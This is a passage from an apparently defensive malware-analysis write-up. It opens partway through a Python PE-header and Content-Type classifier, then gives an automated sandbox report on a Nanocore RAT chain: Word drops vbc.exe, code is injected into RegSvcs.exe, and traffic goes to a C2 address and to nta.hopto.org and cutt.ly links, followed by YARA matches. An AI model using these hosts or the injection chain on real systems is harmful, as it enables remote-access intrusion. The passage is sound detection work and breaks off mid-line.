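    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 0x5C, 16)                                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 8 * CLR_DIRECTORY, 0x2008, 0x48)  # CLR header RVA/size
    sections = b"".join(struct.pack("<8s32x", n) for n in (b".text", b".rsrc", b".reloc"))
    return bytes(dos) + coff + bytes(opt) + sections

# Response headers as the report shows them; only Content-Type matters to the check.
SAMPLE_HEADERS = {"content-type": "application/x-msdownload", "content-length": "1141760",
                  "server": "Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3"}

if __name__ == "__main__":
    print(classify_response(SAMPLE_HEADERS, build_sample_pe()))
    print(classify_response({"content-type": "image/png"}, build_sample_pe()))    # mislabelled PE
    print(classify_response({"content-type": "text/html"}, b"<html>not a PE</html>"))
```

One detail the parser surfaces from the report's own bytes: the TimeDateStamp a3 a4 8f 60 (little-endian 0x608fa4a3) decodes to 2021-05-03 07:22:11 UTC, the same second as the response's Last-Modified header, so the file was built and placed on nta.hopto.org at the same moment and the sample was run about five hours later. The Machine value 0x14c (i386) also explains why the 32-bit RegSvcs.exe under Framework\v2.0.50727 is the injection target on an x64 host.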
Source: unknown | TCP traffic detected without corresponding DNS query: 79.134.225.26 (40 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4CB73-349E-46EF-BF24-C3A751787722}.tmp
Source: unknown | DNS traffic detected: queries for: cutt.ly
Source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://google.com
Source: reg on nta.hopto.org.url.0.dr | String found in binary or memory: http://nta.hopto.org/reg/
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegSvcs.exe, 00000009.00000002.2390042408.0000000004EF0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: dbzEXdF.url.0.dr | String found in binary or memory: https://cutt.ly/dbzEXdF
Source: vbc.exe | String found in binary or memory: https://github.com/unguest
Source: vbc.exe.4.dr | String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
Source: RegSvcs.exe, 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match | File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match | File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY | Matched ru